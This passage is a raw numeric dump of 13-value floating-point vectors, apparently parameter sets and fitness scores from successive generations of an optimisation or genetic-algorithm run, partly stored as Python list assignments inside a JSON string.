-1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.750599822793858e-10, 159354716917.0895, \n 121269083493.68436]\n[0.0, -1.2031098015567e-12, -2.090479539659853e-13, 5.011120217163613e-11, \n -1.7352085678160897e-10, -1.8577367523496564e-15, 7.430575474541962e-16,\n 1.9814643005749893e-05, -1.7639524821935923e-06, -1.500055802123721e-08,\n 8.711551918674385e-10, 168378423128.42877, 121439949900.90005]\n[2.198369754018213e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7513929529124395e-10, -1.82610373802557e-15, \n 7.448076765658434e-16, 2.0042195789951223e-05, -1.7728642137544318e-06,\n -1.5013783998899997e-08, 8.734593739302048e-10, 147068576327.25705, \n 122027384226.92]\n[2.2257852388875064e-10, -1.2059133330572482e-12, -2.090479539659853e-13, \n 4.9793760275117476e-11, -1.7849498396021264e-10, -1.841021101878205e-15,\n 7.556782953802372e-16, 2.022642042947946e-05, -1.769936435419886e-06, -\n 1.5202351660972107e-08, 8.750599822793858e-10, 149871632956.7388, \n 122750625888.09634]\n[2.2152115305769157e-10, -1.2344709098355012e-12, -2.1013781830316155e-13, \n 5.011120217163613e-11, -1.7343044399460855e-10, -1.857281675942834e-15,\n 7.430575474541962e-16, 2.0343113714890682e-05, -1.7639524821935923e-06,\n -1.520980077906525e-08, 8.721578527250325e-10, 151082881535.07886, \n 122935226427.98189]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, \n 123962248783.03809]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.735477478457909e-10, 133427418313.38545, \n 131702579310.68652]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.116126459765591e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.517941226634992e-08, 8.771058818345121e-10, 137250169853.3863, \n 133211383937.09729]\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.842789515995345e-15,\n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 123172560507.99263, \n 143105235055.608]\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1171136727356646e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 119639757591.69511, \n 143860615432.91934]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 118202331336.15999, \n 145092770865.8836]\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.021867485100539e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.760544278271184e-10, 110377805870.9487, \n 155477031697.76462]\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7281503437685213e-10, -1.82610373802557e-15, \n 8.836470142939426e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.500055802123721e-08, 8.760544278271184e-10, 107979663117.63412, \n 158587944243.89005]\n[0.0, -1.2031098015567e-12, -2.522559178506789e-13, 5.003845283040925e-11, \n -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, \n 1.9950498914670327e-05, -1.7639524821935923e-06, -1.500055802123721e-08,\n 8.760544278271184e-10, 99132279868.34593, 171185572417.85907]\n[2.2257852388875064e-10, -1.2031098015567e-12, -2.5161591646068603e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.82610373802557e-15, \n 8.811799226535086e-16, 2.022642042947946e-05, -1.7639524821935923e-06, \n -1.508244156181531e-08, 8.760544278271184e-10, 93130287119.72461, \n 180430143233.58368]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8265258253512156e-15,\n 7.430575474541962e-16, 2.0240988631290876e-05, -1.7728642137544318e-06,\n -1.5013783998899997e-08, 8.784555835692595e-10, 86927194519.4496, \n 183449646874.34637]\n[7.863427642383715e-09, -1.2031098015567e-12, -2.5161591646068603e-13, \n 4.9793760275117476e-11, -1.7380412465809723e-10, -1.82610373802557e-15,\n 7.430575474541962e-16, 2.022642042947946e-05, -1.7639524821935923e-06, \n -1.500055802123721e-08, 8.750599822793858e-10, 87084714365.5935, \n 191076754457.2524]\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7849498396021264e-10, -1.857281675942834e-15,\n 7.485411998460075e-16, 1.9750639916729973e-05, -1.769936435419886e-06, \n -1.5013783998899997e-08, 8.825388912755251e-10, 96474604776.96465, \n 194275355409.06598]\n[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 4.9793760275117476e-11,\n -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, \n 2.022642042947946e-05, -1.7639524821935923e-06, -1.503739318330452e-08,\n 8.760544278271184e-10, 86984982238.58047, 194967876303.00238]\n[1.5200576895768509e-09, -1.2059133330572482e-12, -2.0752021923147355e-13, \n 5.011120217163613e-11, -1.7849498396021264e-10, -1.82610373802557e-15, \n 7.479116563110691e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.4682044872577598e-08, 8.724478065416361e-10, 82147238279.93182, \n 198112832281.90573]\n[2.223825616669009e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7326944854292794e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.534155691698868e-08, 8.721578527250325e-10, 175522473614.0067, \n 115813093887.0164]\n[2.2296631466270538e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 2.0431066002844864e-05, -1.7780476812466564e-06,\n -1.5013783998899997e-08, 8.717160979795123e-10, 146919548917.9041, \n 118508631814.89664]\n[2.2152115305769157e-10, -1.2131115225525171e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.529126273308479e-08, 8.750599822793858e-10, 189141514324.11395, \n 119478476003.54858]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1171136727356646e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.515944456372276e-08, 8.735477478457909e-10, 171393648132.89902, \n 119746195767.88297]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.680779846505464e-10, 198413310387.34686, \n 120002114057.9749]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, \n 123962248783.03809]\n[2.2152115305769157e-10, -1.1981340041661674e-12, -2.0952905567462806e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.397318554179349e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.721578527250325e-10, 146191133033.73245, \n 124495463707.0261]\n[2.220169404817274e-10, -1.2059133330572482e-12, -2.0840667223230766e-13, \n 5.0388416851351e-11, -1.7352085678160897e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.535159731564839e-08, 8.794413360449789e-10, 153568856127.85236, \n 127226107362.62663]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, \n 7.476241521935537e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.504298228349246e-08, 8.735477478457909e-10, 140382068840.41766, \n 128048566261.66084]\n[-9.575357968769427e-09, -1.2140137633227375e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.747166095423015e-10, -1.842789515995345e-15, \n 7.430575474541962e-16, 2.0343533479720338e-05, -1.761484506217259e-06, \n -1.520980077906525e-08, 8.721578527250325e-10, 135600496522.7375, \n 129146670219.88675]\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.449634745732176e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.735477478457909e-10, 131821303340.10287, \n 132556338910.10567]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.0382265280257245e-11, -1.743336316696023e-10, -1.813766783798406e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.735477478457909e-10, 129406444985.873, \n 132653030892.18918]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7480334166671461e-06, \n -1.520980077906525e-08, 8.721578527250325e-10, 133865099427.32999, \n 140436120253.29218]\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.842789515995345e-15,\n 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 123172560507.99377, \n 143105235055.60883]\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 119639757591.69417, \n 143860615432.91846]\n[2.2282051950271776e-10, -1.2059133330572482e-12, -2.1171136727356646e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 119621740814.33159, \n 143868003797.30536]\n[-9.575357968769427e-09, -1.2028279049571785e-12, -2.1051647732787472e-13, \n 5.039644867967898e-11, -1.7558160485557454e-10, -1.842789515995345e-15,\n 7.430575474541962e-16, 1.9863936167468564e-05, -1.7639524821935923e-06,\n -1.5013783998899997e-08, 8.749223081325664e-10, 121395913545.80966, \n 144269444777.14786]\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 118220156709.2957, \n 145085114899.6645]\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1171136727356646e-13, \n 5.011120217163613e-11, -1.7471650977559177e-10, -1.8261648304268637e-15,\n 7.416691902768309e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 118220156709.04602, \n 145085114900.12366]\n[2.2082942462171206e-10, -1.2071709641632366e-12, -2.0913778067377877e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.5074975460776788e-08, 8.721578527250325e-10, 109968109293.02217, \n 145590447784.79443]\n[2.22213071071529e-10, -1.2059133330572482e-12, -2.1085309656936224e-13, \n 5.021867485100539e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.760267738096764e-10, 111899934222.58044, \n 153694065180.84283]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.0866854154642685e-13, \n 5.011120217163613e-11, -1.766361848796505e-10, -1.8339694239958517e-15,\n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.760544278271184e-10, 112511385038.11157, \n 154263245256.49524]\n[3.868816176815073e-09, -1.2030336482043862e-12, -2.1171136727356646e-13, \n 5.021867485100539e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.4920809345224143e-08, 8.750599822793858e-10, 102250033424.31876, \n 164710456294.5225]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.452586179271996e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.4975512206722303e-08, 8.721578527250325e-10, 92516509687.73035, \n 170174200265.44513]\n",
"step-4": "one=[7.236287049225701e-06, -1.445911565527231e-12, -1.7498772740084537e-13, 5.109944355076077e-11, -2.5430545472048434e-10, -1.1709514644876058e-15, 3.210132219509301e-16, 2.502027767038304e-05, -1.975229899156637e-06, -1.4769695480936238e-08, 8.945619840357268e-10, 135323228000.64511, 130464457208.5385]\ntwo=[6.101651991514008e-06, -1.2764740103418866e-12, -1.9703439809858206e-13, 4.396430723625485e-11, -7.256876412950873e-11, -1.0739249647595844e-15, 3.658727722774004e-16, 2.9622074287767617e-05, -1.9615179204309246e-06, -1.518516920005905e-08, 8.601004856702239e-10, 194360719320.3122, 75684271432.82758]\nthree=[6.4442734160126695e-06, -1.2463732938819767e-12, -1.7912928652160854e-13, 3.990379556815055e-11, -7.256876412950873e-11, -1.128505986956859e-15, 3.855466000081844e-16, 2.7105518268805634e-05, -1.918022677712299e-06, -1.648586510957147e-08, 8.952907812465134e-10, 40874176708.45886, 129961018217.7445]\nfour=[5.591985036569838e-06, -1.5732644861037622e-12, -1.2586540738798186e-13, 5.508993685740796e-11, -2.345347836605763e-10, -2.1583737575101563e-15, 3.315525502908504e-16, 2.240369111953624e-05, -1.8808495402864136e-06, -1.5154818034574072e-08, 9.134128217572173e-10, 95538034865.65512, 192689393537.75766]\nfive=[5.9877501684316964e-06, -1.4725222964411265e-12, -2.0184675219747084e-13, 4.503520441436847e-11, -2.195719309752964e-10, -1.1996862422718706e-15, 3.172649531291829e-16, 2.235294071412983e-05, -1.7673862518012629e-06, -1.593810591566234e-08, 8.495479067416047e-10, 172629547544.72174, 121012464101.10771]\nsix = [6.525636151737385e-10, -1.5516831882387681e-12, -1.7065883936338436e-13, 4.6265959327559024e-11, -2.669670220497726e-10, -1.0739249647595844e-15, 9.085513864943156e-16, 2.5963751617497686e-05, -1.9757021060346726e-06, -1.5031696163247858e-08, 8.945619840357268e-10, 99871865434.22476, 123933224114.80229]\n\nfirst1_gen= [[6.417695307686038e-06, -1.2416886913890308e-12, -1.791907685050265e-13, 3.983180616117193e-11, -7.243488055496258e-11, -1.1211433897576025e-15, 3.855466000081844e-16, 2.7255618460061466e-05, -1.917823676019374e-06, -1.6515339421288782e-08, 9.011563904603084e-10, 37866240406.859344, 251532289608.81], [5.974092884160685e-06, -1.4591405170404072e-12, -2.0184675219747084e-13, 4.3821744446480515e-11, -7.22093644433135e-11, -1.0712173220027044e-15, 3.65758224365464e-16, 2.235294071412983e-05, -1.763797302814154e-06, -1.6059311052756668e-08, 8.601004856702239e-10, 50907349656.8246, 117645129547.73723], [7.171513003462397e-06, -1.4334443716578728e-12, -1.749514610735409e-13, 5.509823004788858e-11, -2.5310572250093563e-10, -1.1729621402736547e-15, 3.321162280251396e-16, 2.4812886502853343e-05, -1.964119169077712e-06, -1.4799846596325615e-08, 8.965548334484032e-10, 85071583311.774, 128667385131.30013], [7.3000149385339486e-06, -1.4508582334938624e-12, -1.7446896418754742e-13, 5.109944355076077e-11, -2.5448794058714256e-10, -1.1658376910672744e-15, 3.1827015830354867e-16, 2.502027767038304e-05, -1.9664311146400523e-06, -1.4730561693079958e-08, 8.945619840357268e-10, 88113858040.47986, 127558862768.52084], [5.581899283069486e-06, -1.5683042319109065e-12, -1.2586540738798186e-13, 5.535493146365402e-11, -2.359264703422783e-10, -2.1583737575101563e-15, 3.2921934547988314e-16, 2.2287538734129395e-05, -1.8740196054647742e-06, -1.5117323048065992e-08, 9.114608510796109e-10, 90926368846.81926, 202187413440.1054], [7.283321725975412e-06, -1.4356567410151954e-12, -1.7340660013452496e-13, 5.090884822547887e-11, -2.5483963758954753e-10, -1.139281753854116e-15, 3.1970242364315826e-16, 2.7105518268805634e-05, -1.963160298901409e-06, -1.4681586301228543e-08, 8.916460477308206e-10, 142505061534.36484, 476063714570.38367], [5.591985036569838e-06, -1.582675728169255e-12, -1.7359285477580936e-13, 5.508993685740796e-11, -2.5320893657294154e-10, -2.1583737575101563e-15, 3.210132219509301e-16, 2.511654073479438e-05, -1.965555797894771e-06, -1.5140087108671845e-08, 9.214909160927855e-10, 154168790181.56195, 151975095946.00134], [6.4442734160126695e-06, -1.5732644861037622e-12, -1.8036634758606428e-13, 5.508993685740796e-11, -7.27534017567909e-11, -2.1583737575101563e-15, 3.306758579127667e-16, 2.2271668826613973e-05, -1.8701423073554431e-06, -1.501078224172373e-08, 8.952907812465134e-10, 267883353895.00665, 158759045786.36343], [6.460391520361948e-06, -1.2647094709156108e-12, -1.7971415732486973e-13, 4.396430723625485e-11, -7.247266456377939e-11, -1.1373744765683215e-15, 3.658727722774004e-16, 2.7105518268805634e-05, -1.9663482803776534e-06, -1.6397993463300374e-08, 8.923803313149724e-10, 349965962553.9084, 297837273933.3269], [5.6272383047081095e-06, -1.5732644861037622e-12, -1.2571170147507106e-13, 5.534697362808701e-11, -2.3610413258218975e-10, -1.1709514644876058e-15, 3.2295817320330796e-16, 2.2314117324425535e-05, -1.8663649176622442e-06, -1.4769695480936238e-08, 9.134128217572173e-10, 393807734620.02893, 1450122303072.2456], [6.437914022666636e-06, -1.2546731037733632e-12, -1.7844406460041829e-13, 5.488975389250315e-11, -7.259445338393382e-11, -2.1597092009682793e-15, 3.3041861616205316e-16, 2.240369111953624e-05, -1.876360375320595e-06, -1.648586510957147e-08, 9.134128217572173e-10, 630890128752.3734, 431834854178.85406], [6.046575120541287e-06, -1.2764740103418866e-12, -1.746683186012092e-13, 5.109944355076077e-11, -2.520608616913497e-10, -1.0704525109919603e-15, 3.6772692838424905e-16, 2.971296945414015e-05, -1.951293357817624e-06, -1.4769695480936238e-08, 8.939102135383639e-10, 871857905030.9667, 2328286443290.7437], [6.051000675950963e-06, -1.2846825520511646e-12, -1.268060597488819e-13, 5.490952472465525e-11, -2.3244121922778247e-10, -2.1424540029363198e-15, 3.673980081076506e-16, 2.961326937497751e-05, -1.895367635724618e-06, -1.5034205062876655e-08, 9.16195585945909e-10, 1374938673042.5493, 4524615824537.332], [5.6149092148265474e-06, -1.4639678768975506e-12, -1.253161090730697e-13, 4.481233479664715e-11, -2.335516269047763e-10, -2.1416544930348844e-15, 3.3108330528832777e-16, 2.22837679272578e-05, -1.8681878215606722e-06, -1.528899727808779e-08, 8.573199342562181e-10, 1914602582873.603, 2013877892656.268], [6.101651991514008e-06, -1.5833077943313046e-12, -1.9703439809858206e-13, 5.500949944067544e-11, -7.256876412950873e-11, -1.0739249647595844e-15, 3.658727722774004e-16, 2.970517711660123e-05, -1.8738366196528042e-06, -1.522166132952199e-08, 9.123763139194573e-10, 3105022967535.493, 7589715261899.736], [7.169307360099383e-06, -1.475336624504327e-12, -2.0167346748799746e-13, 4.53859215469466e-11, -2.1795530264429259e-10, -1.209364174087727e-15, 3.179525403817121e-16, 2.248948490803903e-05, -1.9732992714201345e-06, -1.4769695480936238e-08, 8.472670825115021e-10, 3105580314530.341, 4622017117439.275]]\nsecond1_gen= [[6.473615077297489e-06, -1.2416886913890308e-12, -1.7473505716030156e-13, 3.966285637236728e-11, -7.243488055496258e-11, -1.1645955168783485e-15, 3.1918479761370934e-16, 2.7255618460061466e-05, -1.912188850787629e-06, -1.6430064111592607e-08, 8.970550453733459e-10, 35685411688.23251, 231044368946.34586], [6.393923513974502e-06, -1.2418411778899226e-12, -1.7798884315456173e-13, 3.983180616117193e-11, -7.243742739542879e-11, -1.128236668058653e-15, 3.855466000081844e-16, 2.7200371659468664e-05, -1.9285560276423494e-06, -1.636514926725132e-08, 9.071692193685023e-10, 57865021002.9106, 360571654391.1672], [7.230454358781939e-06, -1.423600316370741e-12, -1.7526876652912844e-13, 5.484412599476033e-11, -7.222102668803471e-11, -1.1795054510279537e-15, 3.642469974043324e-16, 2.4721354631465055e-05, -1.7738362153245365e-06, -1.6042437181983083e-08, 8.601004856702239e-10, 60788722272.11295, 440230270157.01904], [6.435449388867622e-06, -1.2416886913890308e-12, -1.807074860305897e-13, 5.4624696474782334e-11, -7.299561923303083e-11, -1.1155657493946243e-15, 3.855466000081844e-16, 2.4639345261867096e-05, -1.92912357850029e-06, -1.4800406168095671e-08, 9.011563904603084e-10, 90541420172.20418, 503189560104.03455], [6.417695307686038e-06, -1.2339817339229541e-12, -1.7924803979756243e-13, 5.5902899343682586e-11, -7.217875877484109e-11, -1.120826019773443e-15, 3.8364837768074985e-16, 2.2074405673546407e-05, -1.904212437644655e-06, -1.509791791618086e-08, 8.960324081400173e-10, 91138056935.866, 156256693553.4698], [7.235432436183002e-06, -1.444519147741974e-12, -1.7273464723057338e-13, 5.517809418856912e-11, -2.5310572250093563e-10, -1.1658376910672744e-15, 3.3048095015500005e-16, 2.4812886502853343e-05, -1.964119169077712e-06, -1.4777953862585708e-08, 8.945619840357268e-10, 98015149423.40909, 125389712442.99564], [6.382295596647026e-06, -1.5683042319109065e-12, -1.271182130914441e-13, 3.9709881372590666e-11, -2.3411267641257417e-10, -1.1298867172210502e-15, 3.273827033054119e-16, 2.71828464025051e-05, -1.86879521538149e-06, -1.6615697675064263e-08, 8.938783145101195e-10, 108132988244.55444, 600937075323.7117], [7.3000149385339486e-06, -1.4649443926376347e-12, -1.740251215699652e-13, 5.5040821609381877e-11, -2.5448794058714256e-10, -1.1729621402736547e-15, 3.321162280251396e-16, 2.492985953688089e-05, -1.95260325957056e-06, -1.4879723555310096e-08, 8.886352647229086e-10, 118040637271.1665, 119637343045.177], [5.595995170722691e-06, -1.5775800984465949e-12, -1.2531378473105398e-13, 5.5737478708430025e-11, -2.359264703422783e-10, -2.141274549861917e-15, 3.2670998922499434e-16, 2.2375793269713536e-05, -1.8912926681237391e-06, -1.5244852134327217e-08, 9.114608510796109e-10, 193706809398.06177, 145429438824.56485], [6.417695307686038e-06, -1.2390179448049186e-12, -2.0184675219747084e-13, 3.996761820973954e-11, -7.30077645678233e-11, -1.0733818300903034e-15, 3.6521589033170274e-16, 2.7380751148035565e-05, -1.901967051200766e-06, -1.6531476837456585e-08, 8.659462633971021e-10, 291714681643.4888, 219358626907.00577], [7.269087955666727e-06, -1.4398732474157131e-12, -1.745771866624504e-13, 5.5370858680922966e-11, -2.5212090845365535e-10, -1.1547640084684547e-15, 3.1826570991307717e-16, 2.4799848604697875e-05, -1.9802449310363633e-06, -1.4932011828861567e-08, 8.916225586049855e-10, 291814703950.912, 265497905413.09335], [5.9575073045674184e-06, -1.4591405170404072e-12, -1.7515686156504634e-13, 5.071091939607585e-11, -7.251972289899038e-11, -1.172163868062928e-15, 3.2003450301868095e-16, 2.236559796692659e-05, -1.964000257622103e-06, -1.461000086726312e-08, 8.924031273079037e-10, 441351014961.37744, 513124822279.29816], [7.118156558728498e-06, -1.4213484509322684e-12, -1.7594919642528414e-13, 5.502275447498347e-11, -2.359264703422783e-10, -2.146866081339977e-15, 3.3020925008057705e-16, 2.48800717576552e-05, -1.8740196054647742e-06, -1.4681760148497176e-08, 9.194043116452982e-10, 480601682287.2741, 2166349399584.3464], [6.435379358296727e-06, -1.449279705541305e-12, -1.791907685050265e-13, 4.013727926643595e-11, -2.561628978573389e-10, -1.1658376910672744e-15, 3.1916771926698506e-16, 2.706170262409588e-05, -1.9747493962051268e-06, -1.6529378614728517e-08, 8.945619840357268e-10, 480690251628.6576, 455217335045.56067], [7.273965294010602e-06, -1.4508582334938624e-12, -1.2640181562203036e-13, 5.1256890020829106e-11, -2.347526011960417e-10, -1.1573810914157072e-15, 3.313802025100971e-16, 2.5248996663846427e-05, -1.8890715225154116e-06, -1.4830513494585048e-08, 9.024560997678787e-10, 513022508534.7746, 1741282758378.8208], [7.171513003462397e-06, -1.4334443716578728e-12, -1.258745292341622e-13, 5.562080442549079e-11, -2.5310572250093563e-10, -2.177369178159867e-15, 3.269368594462498e-16, 2.5052523082312023e-05, -1.9593459141604013e-06, -1.4665768665138152e-08, 8.920318373308913e-10, 559251400205.1976, 313686240874.89294]]\nthird1_gen= [[6.428534934734018e-06, -1.2348251959432863e-12, -1.767418187059626e-13, 3.954772029523348e-11, -7.292041892016764e-11, -1.1216042005993232e-15, 3.8462974452187554e-16, 2.732021800880368e-05, -1.912188850787629e-06, -1.6465861899672315e-08, 8.953663972360121e-10, 35914970214.05617, 208658422545.5101], [6.449609175276781e-06, -1.2355212093166627e-12, -1.7892996139776768e-13, 3.978108705811362e-11, -7.260470610345522e-11, -1.128236668058653e-15, 3.8262320992212617e-16, 2.699492740612888e-05, -1.9285560276423494e-06, -1.6459368248390354e-08, 9.071692193685023e-10, 37667755025.66565, 260591174431.75333], [6.393923513974502e-06, -1.2329510175057565e-12, -1.7878217157136278e-13, 4.009121098742944e-11, -7.243742739542879e-11, -1.119215448440791e-15, 3.855466000081844e-16, 2.7170577516281446e-05, -1.946180426984478e-06, -1.6356719885598995e-08, 9.071692193685023e-10, 41822657912.61174, 187148082730.9518], [6.393923513974502e-06, -1.2418411778899226e-12, -1.7764720872488035e-13, 5.5839617178535e-11, -7.217875877484109e-11, -1.1285205693786809e-15, 3.8241419562917457e-16, 2.727322263242888e-05, -1.9285560276423494e-06, -1.6299569164241514e-08, 8.954758973117168e-10, 45658359101.85514, 143455126000.2526], [6.412748625088242e-06, -1.2418411778899226e-12, -1.7788474362949836e-13, 3.98996561577576e-11, -7.290920324596793e-11, -1.1258830930124426e-15, 3.8322709394594156e-16, 2.6978084672522227e-05, -1.9285560276423494e-06, -1.6212095851483947e-08, 9.06465374180439e-10, 61888825971.955795, 378668457219.4866], [7.2950079161541e-06, -1.423600316370741e-12, -1.8067111524974517e-13, 5.467528933636526e-11, -7.269174548770519e-11, -1.1131382577055909e-15, 3.642469974043324e-16, 2.442302310111588e-05, -1.9365154780516644e-06, -1.4736235919210341e-08, 9.02573445716291e-10, 72168008768.07632, 429565720321.34186], [7.277641363649251e-06, -1.4186237292635021e-12, -1.7672076654522444e-13, 5.4875348972838477e-11, -7.250728822785179e-11, -1.1805107762756462e-15, 3.880180132520679e-16, 2.7230117388865188e-05, -1.79140018540739e-06, -1.6042437181983083e-08, 8.524740779894739e-10, 144497176198.74966, 733034177617.006], [6.435449388867622e-06, -1.2375432988348708e-12, -1.8114977137612309e-13, 3.9353291584632385e-11, -7.306938943468394e-11, -1.1645955168783485e-15, 3.887993677152085e-16, 2.4432920122355823e-05, -1.927081007099796e-06, -1.644170413651962e-08, 9.09149545755435e-10, 151124978488.96066, 169172823395.74277], [7.278147471012389e-06, -1.4279386093057266e-12, -1.7683419692117291e-13, 5.493758019518918e-11, -7.289146026177328e-11, -1.1733747472097884e-15, 3.675691109659462e-16, 2.4721354631465055e-05, -1.7638896999117907e-06, -1.588988736168235e-08, 8.632841256471107e-10, 202474467398.45615, 922092113586.5779], [7.177079530800026e-06, -1.234976832476029e-12, -1.7526876652912844e-13, 5.534254133122458e-11, -7.205830797649949e-11, -1.120826019773443e-15, 3.8364837768074985e-16, 2.2258192147086412e-05, -1.7878127478583311e-06, -1.620023857736605e-08, 8.601004856702239e-10, 213869103072.6637, 175609972725.89545], [6.350923506939188e-06, -1.2525603780194753e-12, -1.7993410193080307e-13, 5.465765498048408e-11, -7.243742739542879e-11, -1.1188147125437704e-15, 3.855466000081844e-16, 2.47790541156232e-05, -1.9163436765125797e-06, -1.4800406168095671e-08, 9.043461740243768e-10, 224990894591.97565, 940216435276.2135], [6.375685299492019e-06, -1.2470011129066444e-12, -1.7556981763399573e-13, 5.482994274294271e-11, -7.247391358991481e-11, -1.1737410455893592e-15, 3.8256427214483946e-16, 2.4747394888572957e-05, -1.921085601798487e-06, -1.655011267092608e-08, 9.011563904603084e-10, 242139334921.33466, 239644754200.97003], [6.474178960026375e-06, -1.436844524248817e-12, -1.766513283684079e-13, 